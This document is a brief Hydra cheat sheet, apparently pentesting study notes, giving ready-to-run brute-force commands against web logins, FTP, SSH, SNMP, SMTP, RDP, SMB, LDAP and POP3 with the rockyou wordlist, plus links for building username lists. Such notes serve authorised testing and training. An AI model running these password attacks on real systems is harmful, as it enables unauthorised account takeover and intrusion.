Hydra

http-post-form

hydra -l name -P rockyou.txt $ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

hydra -L usernames.txt -P passwords.txt -f -v 10.10.33.144 http-post-form "/login.php:username=^USER^&password=^PASS^:Please enter the correct credentials"

ftp

hydra -t 4 -l name -P rockyou.txt -vV $ip ftp -s non-default-port

-t 4 4 are parallel connections per target

ssh

hydra -l molly -P rockyou.txt $ip ssh -V

snmp, smtp

hydra -P rockyou.txt -v $ip snmp/smtp

popup box

hydra -l bob -P rockyou.txt $ip http-get /protected

The trick here is to separately set the IP and PATH

RDP

hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://$ip

SMB, LDAP, POP3

hydra -L users.txt -P rockyou.txt $ip smb/ldap2/pop3 -V -f

Build username list

• https://github.com/A1vinSmith/OSCP-PWK/blob/master/HackTheBox/Windows/Active%20Directory/Sauna/README.md#username-anarchy-from-website-as-source
• https://github.com/A1vinSmith/username-anarchy?organization=A1vinSmith&organization=A1vinSmith

Tips

Try ZAP, Burp or Wfuzz as backup